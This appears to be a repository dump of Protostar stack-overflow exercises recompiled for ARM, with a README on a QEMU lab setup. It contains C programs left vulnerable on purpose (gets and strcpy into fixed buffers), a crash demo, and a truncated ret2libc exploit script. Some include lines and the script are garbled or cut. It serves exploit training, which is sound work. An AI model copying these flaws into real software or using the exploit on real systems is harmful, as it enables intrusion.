├── README.md └── protostar ├── stack0 ├── exploit.py ├── stack0 └── stack0.c ├── stack1 ├── stack1 └── stack1.c ├── stack2 ├── stack2 └── stack2.c ├── stack3 ├── stack3 └── stack3.c ├── stack4 ├── stack4 └── stack4.c ├── stack5 ├── stack5 └── stack5.c ├── stack6 ├── stack6 └── stack6.c └── stack7 ├── stack7 └── stack7.c /README.md: -------------------------------------------------------------------------------- 1 | # exploit-exercises-arm 2 | I have taken all of the challenges from Protostar - https://exploit-exercises.com/protostar/- and compiled them for the ARM architecture. The QEMU setup I am using locally includes -> https://github.com/hugsy/gef, Capstone, ROPGadget, and the Radare2 Python Bindings. 3 | 4 | **I will be adding the Format, Heap, Net and Final exercises over the next two weeks - Check back soon!** 5 | 6 | SSH 7 | --- 8 | 9 | ``` 10 | # Password is raspberry 11 | ssh pi@127.0.0.1 -p 5022 12 | ``` 13 | 14 | Socat 15 | ----- 16 | 17 | ``` 18 | nc -vv 127.0.0.1 5023 19 | localhost [127.0.0.1] 5023 (htuilsrv) open 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | Total received bytes: 0 22 | Total sent bytes: 155 23 | 24 | pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ ulimit -c unlimited 25 | pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ socat tcp-l:6666,reuseaddr,fork exec:"./stack0" 26 | pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ ls 27 | core stack0 stack0.c 28 | ``` 29 | 30 | GEF 31 | --- 32 | ``` 33 | pi@raspberrypi ~/exploit-exercises-arm/protostar/stack0 $ gdb -c core 34 | GNU gdb (GDB) 7.4.1-debian 35 | Copyright (C) 2012 Free Software Foundation, Inc. 36 | License GPLv3+: GNU GPL version 3 or later 37 | This is free software: you are free to change and redistribute it. 38 | There is NO WARRANTY, to the extent permitted by law. Type "show copying" 39 | and "show warranty" for details. 40 | This GDB was configured as "arm-linux-gnueabihf". 41 | For bug reporting instructions, please see: 42 | . 43 | gef loaded, `gef help' to start, `gef config' to configure 44 | 30 commands loaded (10 sub-commands), using Python engine 2.7 45 | [New LWP 2672] 46 | Core was generated by `./stack0'. 47 | Program terminated with signal 11, Segmentation fault. 48 | #0 0x41414140 in ?? () 49 | gef> gef help 50 | ====================[ GEF - GDB Enhanced Features ]==================== 51 | aslr -- View/modify GDB ASLR behavior. 52 | assemble -- AssembleCommand: using radare2 to assemble code (requires r2 Python bindings) 53 | Architecture can be set in GEF runtime config (default is x86). 54 | Use `list' subcommand to list architectures supported 55 | checksec -- Checksec.sh (http://www.trapkit.de/tools/checksec.html) port. 56 | context -- Display execution context. 57 | cs-dis -- Use capstone disassembly framework to disassemble code. 58 | ctf-exploit-templater -- Generates a ready-to-use exploit template for CTF. 59 | deref -- Dereference recursively an address and display information 60 | dump-memory -- Dump chunks of memory into raw file on the filesystem. Dump file 61 | name template can be defined in GEF runtime config 62 | elf-info -- Display ELF header informations. 63 | entry-break -- Tries to find best entry point and sets a temporary breakpoint on it. 64 | fd -- Enumerate file descriptors opened by process. 65 | fmtstr-helper -- Exploitable format-string helper (experimental) 66 | gef-alias -- GEF defined aliases 67 | heap -- Get some information about the Glibc heap structure. 68 | inspect-stack -- Exploiter-friendly top-down stack inspection command (peda-like) 69 | invoke -- InvokeCommand: invoke an external command and display result. 70 | ksymaddr -- Solve kernel symbols from kallsyms table. 71 | patch -- Patch the instruction pointed by parameters with NOP. If the return option is 72 | specified, it will set the return register to the specific value. 73 | pattern -- Metasploit-like pattern generation/search 74 | ps -- List and filter process. 75 | reg -- Display full details on one, many or all registers value from current architecture. 76 | reset-cache -- Reset cache of all stored data. 77 | ropgadget -- ROPGadget (http://shell-storm.org/project/ROPgadget) plugin 78 | shellcode -- ShellcodeCommand uses @JonathanSalwan simple-yet-awesome shellcode API to 79 | download shellcodes 80 | trace-run -- Create a runtime trace of all instructions executed from $pc to LOCATION specified. 81 | vmmap -- Display virtual memory mapping 82 | xd -- Display arranged hexdump (according to architecture endianness) of memory range. 83 | xfiles -- Shows all libraries (and sections) loaded by binary (Truth is out there). 84 | xinfo -- Get virtual section information for specific address 85 | xor-memory -- XOR a block of memory. 86 | ``` 87 | -------------------------------------------------------------------------------- /protostar/stack0/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | 3 | import subprocess 4 | from struct import * 5 | 6 | # libc 7 | # 0xb6ebc000 8 | 9 | # 0x000ce774 : pop {r0, r1, r2, r3, fp, lr} ; bx lr 10 | # b6f8a774 11 | 12 | # system() 13 | # 0xb6ed2cb8 14 | 15 | # 0xbefff90e: "SHELL=/bin/bash" 16 | # 0xbefff914 17 | # 0xbeffff5c 18 | 19 | buf = 'A' * 72 20 | buf += pack(" 10 | #include 11 | #include 12 | 13 | int main(int argc, char **argv) 14 | { 15 | volatile int modified; 16 | char buffer[64]; 17 | modified = 0; 18 | 19 | gets(buffer); 20 | 21 | if (modified != 0) { 22 | printf("You have changed the 'modified' variables!\n"); 23 | } else { 24 | printf("Try again?!\n"); 25 | } 26 | 27 | return 0; 28 | } -------------------------------------------------------------------------------- /protostar/stack1/stack1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack1/stack1 -------------------------------------------------------------------------------- /protostar/stack1/stack1.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack1.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | int main(int argc, char **argv) 15 | { 16 | volatile int modified; 17 | char buffer[64]; 18 | 19 | if (argc == 1) { 20 | errx(1, "Please specify an argument!\n"); 21 | } 22 | 23 | modified = 0; 24 | strcpy(buffer, argv[1]); 25 | 26 | if (modified == 0x61626364) { 27 | printf("You have correctly got the variable to the right value!\n"); 28 | } else { 29 | printf("Try again, you got 0x%08x\n", modified); 30 | } 31 | 32 | return 0; 33 | } -------------------------------------------------------------------------------- /protostar/stack2/stack2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack2/stack2 -------------------------------------------------------------------------------- /protostar/stack2/stack2.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack2.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | int main(int argc, char **argv) 15 | { 16 | volatile int modified; 17 | char buffer[64]; 18 | char *variable; 19 | 20 | variable = getenv("GREENIE"); 21 | 22 | if(variable == NULL) { 23 | errx(1, "Please set the Greenie environment variable!\n"); 24 | } 25 | 26 | modified = 0; 27 | 28 | strcpy(buffer, variable); 29 | 30 | if(modified == 0x0d0a0d0a) { 31 | printf("You have correctly modified the variabele\n"); 32 | } else { 33 | printf("Try again, you got 0x%08x\n", modified); 34 | } 35 | } -------------------------------------------------------------------------------- /protostar/stack3/stack3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack3/stack3 -------------------------------------------------------------------------------- /protostar/stack3/stack3.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack3.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | void win() 15 | { 16 | printf("Code flow successfully changed!\n"); 17 | } 18 | 19 | int main(int argc, char **argv) 20 | { 21 | volatile int (*fp)(); 22 | char buffer[64]; 23 | fp = 0; 24 | 25 | gets(buffer); 26 | 27 | if (fp) { 28 | printf("Calling function pointer, jumping to 0x%08x\n"); 29 | fp(); 30 | } 31 | 32 | return 0; 33 | } -------------------------------------------------------------------------------- /protostar/stack4/stack4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack4/stack4 -------------------------------------------------------------------------------- /protostar/stack4/stack4.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack4.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | void win() 15 | { 16 | printf("Code flow successfully changed\n"); 17 | } 18 | 19 | int main(int argc, char **argv) 20 | { 21 | char buffer[64]; 22 | gets(buffer); 23 | 24 | return 0; 25 | } 26 | -------------------------------------------------------------------------------- /protostar/stack5/stack5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack5/stack5 -------------------------------------------------------------------------------- /protostar/stack5/stack5.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack5.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | int main(int argc, char **argv) 15 | { 16 | char buffer[64]; 17 | gets(buffer); 18 | 19 | return 0; 20 | } -------------------------------------------------------------------------------- /protostar/stack6/stack6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack6/stack6 -------------------------------------------------------------------------------- /protostar/stack6/stack6.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack6.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | void getpath() 15 | { 16 | char buffer[64]; 17 | unsigned int ret; 18 | 19 | printf("Input path please: "); fflush(stdout); 20 | 21 | gets(buffer); 22 | 23 | ret = __builtin_return_address(0); 24 | 25 | if ((ret & 0xbe000000) == 0xbe000000) { 26 | printf("Bzzzt (%p) \n", ret); 27 | _exit(1); 28 | } 29 | 30 | printf("Got path: %s\n", buffer); 31 | } 32 | 33 | int main(int argc, char **argv) 34 | { 35 | getpath(); 36 | 37 | return 0; 38 | } -------------------------------------------------------------------------------- /protostar/stack7/stack7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/VerSprite/exploit-exercises-arm/b68e825df7ba34e7945a98fd6bff471ea9a3b12c/protostar/stack7/stack7 -------------------------------------------------------------------------------- /protostar/stack7/stack7.c: -------------------------------------------------------------------------------- 1 | // 2 | // stack7.c 3 | // 4 | // 5 | // Created by rotlogix on 4/5/15. 6 | // 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | char *getpath() 15 | { 16 | char buffer[64]; 17 | unsigned int ret; 18 | 19 | printf("Input path please: "); fflush(stdout); 20 | 21 | gets(buffer); 22 | 23 | ret = __builtin_return_address(0); 24 | 25 | if((ret & 0xb0000000) == 0xb0000000) { 26 | printf("Bzzzt (%p)\n", ret); 27 | _exit(1); 28 | } 29 | 30 | printf("Got path: %s\n", buffer); 31 | return strdup(buffer); 32 | } 33 | 34 | int main(int argc, char **argv) 35 | { 36 | getpath(); 37 | 38 | 39 | 40 | } 41 | --------------------------------------------------------------------------------